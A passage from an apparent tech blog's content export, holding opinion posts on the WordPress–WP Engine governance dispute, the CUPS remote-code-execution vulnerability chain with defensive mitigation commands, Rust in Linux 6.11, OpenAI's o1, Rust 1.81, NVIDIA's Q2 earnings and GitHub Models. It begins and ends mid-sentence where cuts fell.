isn\u0026rsquo;t the business dispute — companies fight about money and trademarks all the time. What concerns me is the governance structure that made this possible.\nWordPress.org — the repository that hosts plugins, themes, updates, and much of the project\u0026rsquo;s infrastructure — is controlled by Automattic. Or more precisely, it\u0026rsquo;s controlled by Matt Mullenweg personally. There is no independent foundation governing the project\u0026rsquo;s shared infrastructure. 
This stands in sharp contrast to how open source communities like OpenTofu have established governance models that prevent single-entity control. Unlike the Linux Foundation, the Apache Software Foundation, or even the Python Software Foundation, WordPress has no independent body that separates the project\u0026rsquo;s governance from any single company\u0026rsquo;s interests.\nThis means that one person can, as we\u0026rsquo;ve just seen, cut off a major hosting provider\u0026rsquo;s access to the plugin repository. That\u0026rsquo;s an enormous amount of power concentrated in a single individual, and the fact that it was exercised impulsively — in the context of what reads like a personal grudge — should alarm everyone in the WordPress ecosystem.\nThe WordPress community has tolerated this governance structure because, for twenty years, it mostly worked. Mullenweg was seen as a benevolent steward. But benevolent dictator models have a fundamental flaw: they work exactly until the dictator stops being benevolent, and there are no institutional checks to constrain them.\nImplications for the Ecosystem # The practical implications are already cascading through the WordPress world. Plugin developers are uncertain about the reliability of WordPress.org as a distribution platform. Hosting companies are evaluating whether their dependence on WordPress.org infrastructure is a business risk. Enterprise customers who chose WordPress precisely because of its open source nature are reconsidering that choice.\nSome of this will blow over. Lawsuits will be filed and settled, tempers will cool, and pragmatic business interests will eventually reassert themselves. But the fundamental trust has been damaged.\nIf you\u0026rsquo;re running WordPress at any scale, my immediate recommendation is to ensure you have local mirrors of your critical plugins and themes. Don\u0026rsquo;t assume WordPress.org will always be available when you need it. 
Plugin developers should consider whether distributing exclusively through WordPress.org is a risk they\u0026rsquo;re comfortable with.\nMy Take # I think Mullenweg has a legitimate grievance about large companies free-riding on WordPress without contributing proportionally. I\u0026rsquo;ve seen this pattern in many open source projects, and it\u0026rsquo;s a real problem that threatens the sustainability of critical software.\nBut the way he\u0026rsquo;s chosen to address it — using personal control over shared infrastructure as a weapon in a business dispute — is worse than the problem he\u0026rsquo;s trying to solve. He\u0026rsquo;s demonstrated that WordPress\u0026rsquo;s critical infrastructure is subject to the whims of a single individual, and that\u0026rsquo;s a systemic risk that no amount of subsequent good behavior can fully mitigate.\nThe WordPress community needs an independent foundation. Not tomorrow, not after the lawsuit — now. The project is too important, powering over 40% of the web, to have its governance depend on one person\u0026rsquo;s good judgment and emotional state. With supply chain security becoming central to how critical infrastructure is evaluated, governance transparency and accountability are no longer optional luxuries.\nOpen source has always required trust. 
Today, that trust is a little harder to extend.\nThis post is part of my Developer Landscape series, tracking shifts in the broader software development ecosystem.\n","date":"3 October 2024","externalUrl":null,"permalink":"/posts/241003-wordpress-wp-engine-open-source-governance/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The escalating conflict between Automattic and WP Engine raises fundamental questions about open source trademarks, governance, and what happens when a project’s founder picks a fight.","title":"WordPress vs WP Engine — When Open Source Governance Gets Personal","type":"posts"},{"content":"This morning, security researcher Simone Margaritelli (evilsocket) publicly disclosed a chain of vulnerabilities in CUPS — the Common Unix Printing System — that can be exploited for remote code execution on Linux systems. The vulnerabilities, tracked as CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177, affect the cups-browsed service and can be triggered without authentication on systems where the service is running and reachable.\nAfter decades in this industry, you\u0026rsquo;d think I\u0026rsquo;d stop being surprised by critical vulnerabilities in forgotten infrastructure. And yet, here we are with the printing subsystem.\nThe Vulnerability Chain # The attack is elegant in its simplicity, which is exactly what makes it dangerous. Here\u0026rsquo;s how it works:\nCVE-2024-47176: cups-browsed listens on UDP port 631 and trusts any packet it receives to be a legitimate printer advertisement. 
There is no authentication, no validation of the source.\nCVE-2024-47076: The libcupsfilters library doesn\u0026rsquo;t sanitize the attributes returned by an attacker-controlled IPP server, allowing crafted values to flow through the system.\nCVE-2024-47175: libppd writes these unsanitized attributes into temporary PPD (PostScript Printer Description) files without validation.\nCVE-2024-47177: The cups-filters package allows arbitrary commands to be executed through the FoomaticRIPCommandLine directive in PPD files.\nChain them together: send a malicious UDP packet to port 631, advertise a fake printer with crafted attributes, and when a user tries to print to that printer, arbitrary commands execute as the lp user. On many systems, that\u0026rsquo;s enough to pivot to root.\nThe attack does require a user to initiate a print job to the fake printer, which limits the severity somewhat compared to a fully unauthenticated RCE. But the fact that the initial stage — injecting a fake printer — is completely unauthenticated and requires only a single UDP packet is concerning.\nWhy This Matters # Let\u0026rsquo;s be honest: printing on Linux has been a pain point for as long as Linux has existed. CUPS has been the de facto standard since Apple adopted it for macOS in 2002 (and subsequently acquired the project), and it\u0026rsquo;s been bundled in virtually every Linux distribution since.\nBut here\u0026rsquo;s the thing about infrastructure that \u0026ldquo;just works\u0026rdquo; (or, more accurately, \u0026ldquo;works well enough\u0026rdquo;): nobody looks at it. CUPS hasn\u0026rsquo;t received the kind of security scrutiny that high-profile components like OpenSSL, the kernel, or systemd regularly undergo. 
The cups-browsed service, in particular, seems to have been designed in an era when network trust was the default — an era that should have ended two decades ago.\nThe vulnerability highlights a pattern I\u0026rsquo;ve seen repeatedly in my career: the most dangerous code isn\u0026rsquo;t the code that gets the most attention. It\u0026rsquo;s the quiet, boring infrastructure code that\u0026rsquo;s been running unchanged for years, written with assumptions about trust and network topology that are no longer valid.\nImmediate Mitigation # If you\u0026rsquo;re running Linux systems — particularly servers that don\u0026rsquo;t need printing capabilities — the fix is straightforward:\n# Stop and disable cups-browsed\nsudo systemctl stop cups-browsed\nsudo systemctl disable cups-browsed\n# Or block UDP port 631\nsudo ufw deny 631/udp\nFor systems that do need printing, you can stop cups-browsed from accepting remote printer advertisements by editing /etc/cups/cups-browsed.conf and setting BrowseRemoteProtocols to none.\nThe broader question is whether cups-browsed should be running at all on most systems. Printer auto-discovery over the network is a convenience feature, not a necessity. In most enterprise environments, printers are configured explicitly through management tools, making cups-browsed unnecessary attack surface.\nDistribution maintainers are likely to reconsider whether cups-browsed should be enabled by default. Several major distributions have it running out of the box, which means millions of Linux systems are potentially vulnerable right now.\nThe Forgotten Infrastructure Problem # This incident reminds me of Heartbleed in 2014, Shellshock later that year, and the Log4j crisis in 2021. In each case, a critical vulnerability was found in software that was ubiquitous, underfunded, and under-scrutinized. OpenSSL was maintained by two people when Heartbleed hit. Bash hadn\u0026rsquo;t been seriously audited in decades when Shellshock was discovered. 
Log4j was a logging library that nobody thought about until it was everywhere and exploitable.\nCUPS fits the same pattern. It\u0026rsquo;s everywhere, it\u0026rsquo;s old, and until today, nobody was particularly worried about its security posture.\nThe open source community has gotten better at funding critical infrastructure since the Core Infrastructure Initiative (now the Open Source Security Foundation) was established in response to Heartbleed. But CUPS apparently wasn\u0026rsquo;t on anyone\u0026rsquo;s radar as critical infrastructure, despite being installed on virtually every Linux system and macOS machine in the world.\nMy Take # The immediate risk is manageable. Disable cups-browsed if you don\u0026rsquo;t need it. Patch when your distribution provides updates. Audit your network for systems with UDP 631 exposed to the internet.\nThe deeper lesson is one we keep having to relearn: your attack surface includes every service running on every system, including the ones you forgot about. Especially the ones you forgot about. Security isn\u0026rsquo;t just about hardening your application code and your databases — it\u0026rsquo;s about knowing what\u0026rsquo;s running on your systems and why.\nI\u0026rsquo;ve already started an audit of what services are running by default on our infrastructure. I\u0026rsquo;d suggest you do the same. 
The next CUPS-style vulnerability might be in a service you\u0026rsquo;ve never even thought about.\nThis post is part of my Security in Practice series, covering real-world security events and their implications for working engineers.\n","date":"26 September 2024","externalUrl":null,"permalink":"/posts/240926-cups-vulnerability-linux-printing-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A chain of vulnerabilities in CUPS, the Linux printing system, enables remote code execution — and highlights how forgotten infrastructure becomes a security liability.","title":"CUPS Overflows — A Critical Linux Printing Vulnerability Nobody Saw Coming","type":"posts"},{"content":"Linux kernel 6.11 was released this past Sunday, and while every kernel release brings a grab bag of driver updates, performance tweaks, and architecture improvements, this one continues a trend that I find particularly fascinating: the steady expansion of Rust code in the kernel.\nIt\u0026rsquo;s been two years since Rust initially landed in Linux 6.1, and what started as a cautious experiment — limited infrastructure, basic abstractions — is now growing into something that looks increasingly permanent and significant.\nThe State of Rust in 6.11 # The 6.11 release expands Rust\u0026rsquo;s footprint in several ways. There are new abstractions for kernel data structures, improved bindings for device driver development, and continued work on the tooling that makes it possible to write kernel modules in Rust that interoperate cleanly with the existing C codebase.\nPerhaps more importantly, the pace of Rust-related patches has accelerated. The kernel mailing list now regularly includes Rust-related submissions, and the review process — while still rigorous — has become more routine. 
The initial friction of \u0026ldquo;should we even be doing this?\u0026rdquo; has largely given way to \u0026ldquo;how do we do this well?\u0026rdquo;\nThis matters because the Linux kernel is arguably the most conservative large-scale codebase in the world. Linus Torvalds doesn\u0026rsquo;t accept changes lightly, and the maintainer community has decades of deeply ingrained C practices. The fact that Rust is not only surviving but expanding in this environment says something important about the language\u0026rsquo;s maturity and its value proposition for systems programming.\nWhy Rust in the Kernel Matters # The case for Rust in the kernel has always been about memory safety. The Linux kernel has historically been plagued by classes of bugs — use-after-free, buffer overflows, null pointer dereferences — that are largely eliminated by Rust\u0026rsquo;s ownership model. A study by Google\u0026rsquo;s Android team found that memory safety bugs accounted for roughly 65% of security vulnerabilities in their codebase, and the kernel is no exception.\nBut the value goes beyond just preventing crashes. Memory safety bugs in the kernel are security vulnerabilities. Every use-after-free in a kernel driver is a potential privilege escalation exploit. By writing new drivers and subsystems in Rust, the kernel community can systematically reduce the attack surface of the most critical piece of software on most computing devices.\nThe counterarguments are real, though. Rust introduces build complexity — you now need a Rust compiler in your kernel build toolchain. The language\u0026rsquo;s learning curve is steep, particularly for developers who\u0026rsquo;ve spent decades in C. And the interoperability layer between Rust and C code isn\u0026rsquo;t free — there\u0026rsquo;s cognitive overhead in maintaining clean boundaries between the two.\nI\u0026rsquo;ve heard veteran kernel developers express frustration about this, and I understand it. 
If you\u0026rsquo;ve been writing C kernel code for twenty years, being told that a new language will make your code safer can feel dismissive of the enormous skill and discipline that\u0026rsquo;s gone into keeping the kernel as stable as it is.\nThe Broader Systems Programming Shift # What\u0026rsquo;s happening in the Linux kernel reflects a broader shift across systems programming. The White House\u0026rsquo;s ONCD (Office of the National Cyber Director) published a report earlier this year explicitly recommending that organizations move toward memory-safe languages for critical infrastructure. CISA has been saying similar things. When government agencies start making language recommendations, you know the conversation has moved beyond academic debate.\nIn my own work, I\u0026rsquo;ve been watching teams adopt Rust for infrastructure tooling — CLI tools, network proxies, embedded systems — and the pattern is remarkably consistent. The initial learning curve is painful, the first few months are slow, and then productivity catches up and the class of bugs that used to consume debugging time simply stops appearing.\nIt\u0026rsquo;s reminiscent of the gradual adoption of type systems in the JavaScript ecosystem. TypeScript faced similar resistance (\u0026ldquo;JavaScript is fine if you\u0026rsquo;re disciplined enough\u0026rdquo;), and now it\u0026rsquo;s effectively the default for serious web development. Rust may follow a similar trajectory for systems work, though the timeline will be longer because the stakes are higher and the existing codebases are larger.\nWhat 6.11 Means Practically # For most Linux users and even most developers, 6.11 is a routine kernel update. 
You\u0026rsquo;ll get it through your distribution\u0026rsquo;s package manager in due course, and you probably won\u0026rsquo;t notice anything different.\nFor those of us who care about the long-term health of the software ecosystem, though, this release is another data point in an important trend. The kernel — the most critical, most conservative, most scrutinized codebase in open source — is betting on Rust. Not replacing C wholesale, not rewriting everything from scratch, but systematically using a memory-safe language for new development where it makes sense.\nThat\u0026rsquo;s pragmatic engineering, and it\u0026rsquo;s exactly how these transitions should happen.\nMy Take # I\u0026rsquo;ve written C professionally for most of my career, and I have deep respect for what the language enables. But I also have deep respect for evidence, and the evidence is clear: memory safety bugs are the dominant class of security vulnerabilities in systems code, and languages like Rust eliminate them by construction.\nThe Linux kernel\u0026rsquo;s gradual adoption of Rust isn\u0026rsquo;t a rejection of C — it\u0026rsquo;s an acknowledgment that we can do better for new code without throwing away the enormous investment in existing code. That\u0026rsquo;s the right approach, and I\u0026rsquo;m glad to see it gaining momentum with each kernel release.\nIf you\u0026rsquo;re a systems programmer who hasn\u0026rsquo;t tried Rust yet, 6.11 is as good an excuse as any to take a serious look. The language has matured substantially, the tooling is excellent, and the community is welcoming. 
You might be frustrated for the first few weeks, but I suspect you\u0026rsquo;ll be grateful after the first few months.\nThis post is part of my Developer Landscape series, tracking shifts in the broader software development ecosystem.\n","date":"19 September 2024","externalUrl":null,"permalink":"/posts/240919-linux-kernel-6-11-rust-momentum/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Linux kernel 6.11 ships with expanding Rust support, signaling a real shift in systems programming’s most conservative codebase.","title":"Linux 6.11 Lands — Rust's Growing Presence in the Kernel","type":"posts"},{"content":"Today OpenAI unveiled something genuinely different. Not another GPT iteration with more parameters or a wider context window, but a model that fundamentally changes how it approaches problems. They\u0026rsquo;re calling it o1, and its distinguishing feature is that it reasons through problems step by step before producing an answer — what the research community calls chain-of-thought reasoning, but baked into the model architecture itself rather than tacked on via clever prompting.\nI\u0026rsquo;ve been skeptical of many \u0026ldquo;breakthrough\u0026rdquo; announcements in the AI space over the past couple of years. But after spending a few hours with o1 today, I think this one deserves genuine attention.\nWhat Makes o1 Different # The key innovation is straightforward to describe but profound in its implications: o1 takes time to think. When you give it a complex problem, it doesn\u0026rsquo;t immediately start generating tokens. Instead, it works through an internal chain of reasoning — breaking the problem into steps, considering approaches, checking its own logic — before producing a response.\nOpenAI has released two variants: o1-preview (the more capable model) and o1-mini (a smaller, faster version optimized for STEM reasoning tasks). 
Both are available through the API and in ChatGPT for Plus and Team subscribers.\nThe benchmarks are striking. On the American Invitational Mathematics Examination (AIME), OpenAI reports that o1 solved 83% of problems, compared with 13% for GPT-4o. On competitive programming problems from Codeforces, o1 reaches the 89th percentile. On a qualifying exam for the International Physics Olympiad, it solves over 90% of problems correctly.\nBut benchmarks are benchmarks. What matters for those of us building software is how it handles real-world engineering problems.\nThe Developer Experience # In my initial testing, the differences from GPT-4o are most noticeable in multi-step reasoning tasks. Ask o1 to design a database schema with complex relationships and constraints, and it will consider normalization tradeoffs, think about query patterns, and identify potential issues — all before producing its answer.\nThe tradeoff is latency. Where GPT-4o responds almost instantly, o1 can take 10-30 seconds for complex queries as it works through its reasoning chain. For interactive chat, this feels slow. For integration into automated pipelines where you\u0026rsquo;re asking it to solve genuinely hard problems — architecture reviews, complex debugging, algorithm design — the wait is more than justified by the quality improvement.\nOne pattern I\u0026rsquo;m particularly excited about is using o1 for code review in CI/CD pipelines. The reasoning capability means it can trace through execution paths, consider edge cases, and identify logical errors that pattern-matching approaches miss. A colleague already reported that o1-preview caught a subtle race condition in a concurrent Go program that three human reviewers had missed.\nThe o1-mini variant is interesting for a different reason. It\u0026rsquo;s significantly cheaper than o1-preview (about 80% less on the API), and for pure code generation and debugging, it performs nearly as well. 
If you\u0026rsquo;re building AI-assisted development tools and cost matters — and it always does — o1-mini might be the sweet spot.\nWhat This Means for AI-Assisted Development # I think o1 represents an inflection point in how we integrate AI into development workflows. Previous models were essentially very sophisticated autocomplete — predict the next token based on patterns in training data. That\u0026rsquo;s useful, but it has a ceiling. When you encounter problems that require genuine reasoning — understanding causality, planning multi-step solutions, verifying correctness — pattern matching falls short.\nReasoning models potentially lift that ceiling. Not all the way — o1 still makes mistakes, sometimes confidently — but enough that the range of tasks you can reliably delegate to AI expands meaningfully.\nThe implications for tooling are significant. Right now, most AI coding assistants are optimized for speed — suggestions should appear as fast as you can type. But if reasoning quality matters more than latency for certain tasks, we might see a bifurcation: fast pattern-matching models for inline completion, and slower reasoning models for architecture, review, and complex problem-solving.\nI\u0026rsquo;d also expect the competitive pressure on other labs to be intense. Anthropic, Google, and Meta have all been working on similar capabilities. The fact that OpenAI got here first doesn\u0026rsquo;t mean they\u0026rsquo;ll stay ahead, but it does mean the entire field is now racing toward reasoning as the next frontier.\nMy Take # After thirty years in this industry, I\u0026rsquo;ve learned to distinguish between genuinely important advances and marketing hype. o1 feels like the former. Not because it\u0026rsquo;s perfect — it isn\u0026rsquo;t — but because it changes the fundamental capability of what these models can do.\nThe chain-of-thought approach isn\u0026rsquo;t new in research. 
What\u0026rsquo;s new is having it work well enough, at scale, to be commercially viable. And that matters because it means reasoning models will be integrated into products and workflows, which means developers need to start thinking about how to use them effectively.\nMy immediate advice: if you\u0026rsquo;re building anything that uses LLMs for complex analysis — code review, bug detection, architecture evaluation, test generation for edge cases — try o1. The latency cost is real, but the quality improvement for reasoning-heavy tasks is substantial enough to change your architecture decisions.\nWe\u0026rsquo;re still in the early days of understanding what reasoning models can and can\u0026rsquo;t do. But today feels like a meaningful step forward, and I\u0026rsquo;m genuinely curious to see where this leads.\nThis post is part of my ongoing AI in Development series, tracking how artificial intelligence is reshaping software engineering in practice.\n","date":"12 September 2024","externalUrl":null,"permalink":"/posts/240912-openai-o1-reasoning-models/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI releases o1, a model that ’thinks before it answers’ — what chain-of-thought reasoning means for developers and the future of AI-assisted coding.","title":"OpenAI o1 — The Dawn of Reasoning Models","type":"posts"},{"content":"Rust 1.81.0 landed today, and while it\u0026rsquo;s not a headline-grabbing release, it contains a change that the Rust community has been wanting for years: the Error trait is now available in core. That might sound incremental if you\u0026rsquo;re not deep in the Rust ecosystem, but it\u0026rsquo;s the kind of foundational improvement that makes the language more viable in exactly the environments where it needs to grow.\ncore::error::Error — Why It Matters # Until now, the Error trait lived exclusively in std, which meant it was only available in environments with access to the standard library. 
If you were writing code for embedded systems, kernels, WebAssembly, or any other no_std context, you couldn\u0026rsquo;t use the Error trait at all. This created a frustrating split in the ecosystem: libraries that wanted to be usable in no_std environments had to avoid Error entirely, often implementing their own ad-hoc error handling patterns.\nWith Rust 1.81, core::error::Error is stabilized. This means no_std libraries can now implement and work with the standard Error trait. The practical impact is significant:\nEmbedded Rust gets proper error handling infrastructure. No more choosing between no_std compatibility and idiomatic error handling. Library authors can implement Error for their error types without forcing std on their users. The ecosystem moves toward a single, unified error handling pattern regardless of target environment. I\u0026rsquo;ve been watching Rust\u0026rsquo;s embedded story develop for a few years now, and this is one of those changes that removes a real papercut. It\u0026rsquo;s not glamorous, but it\u0026rsquo;s the kind of infrastructure work that makes a language mature. Similar foundational improvements are happening across the ecosystem, from Python\u0026rsquo;s free-threading evolution to systems programming advances, where each language focuses on addressing real ecosystem pain points.\n#[expect(lint)] — Better Lint Management # Rust 1.81 also stabilizes the #[expect()] attribute, which is a smarter version of #[allow()]. Where #[allow(unused)] silences a warning indefinitely — even after you fix the underlying issue — #[expect(unused)] tells the compiler \u0026ldquo;I expect this warning to fire here, suppress it.\u0026rdquo; If the warning doesn\u0026rsquo;t fire (because you fixed the code or the lint changed), #[expect()] itself produces a warning, alerting you that the suppression is no longer needed.\nThis is excellent for code hygiene. 
I\u0026rsquo;ve seen codebases accumulate dozens of stale #[allow()] attributes that were added during development and never cleaned up. #[expect()] makes these self-cleaning: once the suppressed issue is resolved, the attribute tells you to remove it.\n// Old way - this silently stays even after you fix the issue #[allow(unused_variables)] let x = compute_something(); // New way - warns you when the suppression is no longer needed #[expect(unused_variables)] let x = compute_something(); It\u0026rsquo;s a small thing, but it\u0026rsquo;s the kind of thoughtful ergonomic improvement that makes Rust tooling a pleasure to work with — similar to how Python\u0026rsquo;s unified tooling consolidation improves developer experience across different languages.\nLint Sorting and Reason Parameter # Related to lint management, Rust 1.81 stabilizes a reason parameter for lint attributes:\n#[expect(clippy::needless_return, reason = \u0026#34;Explicit returns for clarity in error paths\u0026#34;)] This is documentation for your future self and your teammates. When someone encounters a suppressed lint, they can immediately see why it was suppressed instead of having to dig through git blame and commit messages.\nThe Broader Rust Trajectory # Stepping back from the specific release, I think Rust\u0026rsquo;s trajectory is worth commenting on. The language continues to follow a pattern of steady, incremental improvement rather than dramatic upheaval. Each six-week release adds a few stabilizations, polishes a few rough edges, and occasionally delivers a significant feature.\nCompare this to the landscape two years ago. Async Rust was notoriously painful, the learning curve was steep, and ecosystem fragmentation was a real concern. Today, async Rust is still more complex than async in other languages, but it\u0026rsquo;s dramatically better. The error handling ecosystem has largely converged around thiserror and anyhow. 
The tooling — rust-analyzer, cargo, clippy — is genuinely world-class.\nThe results show in adoption numbers. The 2023 Stack Overflow survey marked Rust as the most admired language for the eighth consecutive year. More importantly, actual production usage is growing. Linux kernel support, Android adoption, Windows kernel components, AWS (Firecracker, Lambda), Cloudflare Workers — Rust is showing up in serious production infrastructure.\nWhere Rust Still Has Growing to Do # That said, let\u0026rsquo;s be honest about the gaps:\nCompile times remain the most common complaint. Large Rust projects can have punishing incremental build times. The compiler team is making progress (parallel front-end, cranelift backend for debug builds), but it\u0026rsquo;s still a real productivity drag.\nThe learning curve hasn\u0026rsquo;t fundamentally changed. Ownership and borrowing still trip up newcomers, and the borrow checker still occasionally rejects code that you know is correct. Improvements like non-lexical lifetimes and better error messages help, but Rust remains harder to learn than Go, Python, or TypeScript.\nGUI development is still immature compared to other ecosystems. There are promising projects (Iced, Slint, Dioxus), but none have reached the maturity of, say, Qt, Electron, or SwiftUI.\nAsync ecosystem fragmentation is improving but not resolved. The tokio vs async-std split has largely resolved in tokio\u0026rsquo;s favor, but async traits remain a source of friction: async fn in traits was stabilized in Rust 1.75, yet it still does not support dynamic dispatch through dyn Trait.\nMy Take # Rust 1.81 is a good release. It\u0026rsquo;s not going to make anyone rewrite their codebase, but the core::error::Error stabilization is the kind of foundational work that enables real ecosystem growth. 
The #[expect()] attribute is the kind of small, thoughtful feature that makes daily Rust development more pleasant.\nI continue to recommend Rust for systems programming, performance-critical services, and any context where correctness matters more than development speed. It\u0026rsquo;s not the right tool for every job — I wouldn\u0026rsquo;t reach for it to build a CRUD API when Go or even Node.js would get me there faster — but for the domains where it fits, nothing else comes close.\nThe six-week release train keeps delivering. That consistency is Rust\u0026rsquo;s secret weapon.\n","date":"5 September 2024","externalUrl":null,"permalink":"/posts/240905-rust-1-81-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Rust 1.81 brings the Error trait into core, stabilizes new lint sorting, and continues the language’s steady march toward broader adoption.","title":"Rust 1.81 Drops — Core Error Trait, Sorted Lints, and Why Rust Keeps Getting Better","type":"posts"},{"content":"NVIDIA reported its Q2 FY2025 earnings yesterday, and the numbers are worth pausing on. Revenue hit $30 billion for the quarter — up 122% year-over-year. Data center revenue alone was $26.3 billion, a 154% increase. The company is now worth over $3 trillion.\nI\u0026rsquo;m not a financial analyst, and I have zero interest in stock picks. But as someone who\u0026rsquo;s been building and deploying software infrastructure for three decades, these numbers tell me something important about where our industry is heading. The demand for AI compute is not slowing down — it\u0026rsquo;s accelerating.\nFollowing the Money to Understand the Architecture # When you look at who\u0026rsquo;s buying NVIDIA\u0026rsquo;s GPUs, a pattern emerges. The hyperscalers — Microsoft, Google, Amazon, Meta — are collectively spending tens of billions on GPU clusters. Meta alone has talked about deploying 350,000 H100 GPUs. 
Microsoft\u0026rsquo;s capital expenditure has ballooned to support Azure AI services and OpenAI\u0026rsquo;s infrastructure needs.\nThis level of spending tells us several things:\nTraining is still compute-hungry: Despite advances in model efficiency, the frontier labs are training ever-larger models that require more compute, not less. The Llama 3.1 405B model that Meta released last month was trained on a cluster of 16,000 H100 GPUs. The next generation will likely require even more.\nInference is becoming the bigger market: As AI features ship in production products — search, code completion, document summarization, image generation — the inference workload is growing rapidly. Every ChatGPT query, every Copilot suggestion, every AI-generated search summary requires GPU compute. NVIDIA said on the earnings call that inference drove more than 40% of data center revenue over the trailing four quarters.\nThe supply chain is the bottleneck: NVIDIA\u0026rsquo;s gross margins are above 75%, which in hardware is extraordinary. This pricing power exists because demand far exceeds supply. TSMC\u0026rsquo;s advanced packaging capacity, specifically CoWoS (Chip on Wafer on Substrate), is the physical constraint. Every GPU needs this packaging, and there simply aren\u0026rsquo;t enough production lines.\nWhat This Means for Cloud Costs # If you\u0026rsquo;re deploying AI workloads in the cloud, you\u0026rsquo;ve probably noticed that GPU instances are expensive and often unavailable. This isn\u0026rsquo;t going to get better soon. The demand dynamics suggest that GPU compute will remain a scarce, premium resource for the foreseeable future.\nThis has practical implications for architecture decisions:\nRight-size your model: Running a 70B parameter model when a fine-tuned 7B model would suffice is burning money. The trend toward smaller, specialized models isn\u0026rsquo;t just an academic exercise — it\u0026rsquo;s an economic necessity. 
I\u0026rsquo;ve seen teams cut their inference costs by 80% by switching from GPT-4-class models to well-tuned smaller models for specific tasks.\nQuantization matters: Techniques like GPTQ and AWQ that reduce model precision from FP16 to INT4 can cut GPU memory requirements by 4x with minimal quality loss. If you\u0026rsquo;re not quantizing your inference models, you\u0026rsquo;re probably over-provisioning.\nBatch your inference: If your workload allows it, batching multiple requests together dramatically improves GPU utilization. A single H100 running one request at a time is catastrophically underutilized. Frameworks like vLLM and TensorRT-LLM handle this automatically, but you need to architect your application to support it.\nThe Blackwell Generation # NVIDIA\u0026rsquo;s next-generation Blackwell GPUs (B100, B200, and the GB200 \u0026ldquo;superchip\u0026rdquo;) are expected to ship later this year and ramp in early 2025. The performance claims are significant: up to 4x faster training and up to 30x faster inference for large language models compared to H100.\nIf those numbers hold even partially, the economics of AI inference could shift meaningfully. Operations that currently require a cluster of H100s might run on a single Blackwell node. That could democratize access to larger models and make AI features viable for smaller companies that currently can\u0026rsquo;t afford the compute.\nBut there\u0026rsquo;s a catch: the initial supply will be constrained, just like H100s were. Early access will go to the hyperscalers and large enterprises with existing purchase agreements. If you\u0026rsquo;re planning your 2025 infrastructure around Blackwell availability, build in contingency plans.\nBeyond NVIDIA: The Competitive Landscape # It\u0026rsquo;s worth noting that NVIDIA isn\u0026rsquo;t the only game in town, even if it feels that way:\nAMD\u0026rsquo;s MI300X is gaining traction, particularly for inference workloads. 
It offers competitive performance at a lower price point, and major cloud providers are adding MI300X instances.\nGoogle\u0026rsquo;s TPUs continue to be a strong option if you\u0026rsquo;re in the Google Cloud ecosystem. TPU v5e is particularly cost-effective for inference.\nCustom silicon from AWS (Trainium, Inferentia) and Microsoft (Maia) is designed specifically for their cloud customers. These chips won\u0026rsquo;t match NVIDIA\u0026rsquo;s flexibility, but they could offer better price-performance for specific workloads.\nGroq\u0026rsquo;s LPUs and other specialized inference accelerators promise dramatically faster and cheaper inference for specific model architectures.\nMy Take # The NVIDIA earnings story isn\u0026rsquo;t really about NVIDIA — it\u0026rsquo;s about the fundamental reshaping of computing infrastructure. We\u0026rsquo;re in the middle of a build-out that\u0026rsquo;s comparable to the original cloud computing wave. The hyperscalers are effectively building a new tier of compute infrastructure specifically for AI, and the spend is unprecedented.\nFor those of us who design and deploy systems, the practical takeaway is clear: GPU compute is expensive and will remain so. Design your AI features with cost efficiency in mind from day one. Use the smallest model that meets your quality bar, optimize your inference pipeline, and keep an eye on the rapidly evolving hardware landscape.\nThe companies that succeed with AI won\u0026rsquo;t necessarily be the ones with the most GPUs — they\u0026rsquo;ll be the ones that use their GPUs most efficiently. That\u0026rsquo;s always been true with infrastructure, and it\u0026rsquo;s no different now.\n","date":"29 August 2024","externalUrl":null,"permalink":"/posts/240829-nvidia-earnings-ai-infrastructure/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"NVIDIA’s Q2 FY2025 earnings show 122% year-over-year revenue growth. 
The numbers reveal where AI infrastructure is heading.","title":"NVIDIA's Q2 Numbers Are Staggering — What It Tells Us About AI Infrastructure Demand","type":"posts"},{"content":"GitHub has quietly launched GitHub Models, a new feature that lets developers experiment with AI models directly from the GitHub platform. Available in public beta, it provides access to models from Meta, Mistral, OpenAI, Microsoft, and others — complete with a playground for testing, API endpoints for integration, and a path to deploy via Azure AI.\nOn the surface, it might seem like yet another AI model catalog. But having spent decades watching how developer tooling evolves, I think this move is more significant than it appears. It\u0026rsquo;s about meeting developers where they are, and that has historically been a winning strategy.\nWhat GitHub Models Actually Offers # The feature is accessible from github.com/marketplace/models and provides three key capabilities:\nInteractive Playground: You can select a model — say Llama 3.1 405B, GPT-4o, or Mistral Large — and immediately start interacting with it. Adjust parameters like temperature, max tokens, and top-p, and see results in real time. No API keys, no setup, no billing configuration. Just pick a model and start prompting.\nAPI Access with GitHub PAT: Each model gets an API endpoint that you can call using your existing GitHub personal access token. This means you can prototype AI integrations in your applications without signing up for yet another service or managing another set of credentials. The API follows the Azure AI inference SDK pattern, so the code is portable.\nCodespaces Integration: With one click, you can spin up a GitHub Codespace pre-configured with sample code for the model you\u0026rsquo;re exploring. 
This is where the developer experience really shines — you go from \u0026ldquo;I wonder how this model works\u0026rdquo; to \u0026ldquo;I have running code in my IDE\u0026rdquo; in under a minute.\nWhy the Integration Point Matters # I\u0026rsquo;ve been thinking about this from the perspective of developer adoption patterns. There\u0026rsquo;s a well-known principle in developer tools: reduce friction and developers will adopt your platform. GitHub Models reduces friction at exactly the right points.\nConsider the current workflow for experimenting with a new AI model. You typically need to:\nFind the model provider\u0026rsquo;s website Create an account Set up billing (even for free tiers, you usually need a credit card) Generate API keys Install an SDK Write boilerplate code Finally start experimenting GitHub Models collapses steps 2 through 6 into essentially nothing. You already have a GitHub account. You already have a PAT. The playground handles the rest.\nThis matters because the AI landscape is fragmenting rapidly. New models drop every week — Llama variants, Mistral releases, specialized fine-tunes — and keeping up requires evaluating each one against your specific use case. Making that evaluation trivially easy is genuinely valuable.\nThe Strategic Play # Let\u0026rsquo;s be real about what\u0026rsquo;s happening strategically. Microsoft owns GitHub and Azure. GitHub Models is a funnel: experiment for free on GitHub, then deploy to production on Azure AI. It\u0026rsquo;s the same playbook as GitHub Actions leading to Azure DevOps, or GitHub Codespaces leveraging Azure compute.\nThat said, I don\u0026rsquo;t think this is cynical. It\u0026rsquo;s actually good developer experience design. The free tier is genuinely useful for experimentation and prototyping. When you\u0026rsquo;re ready 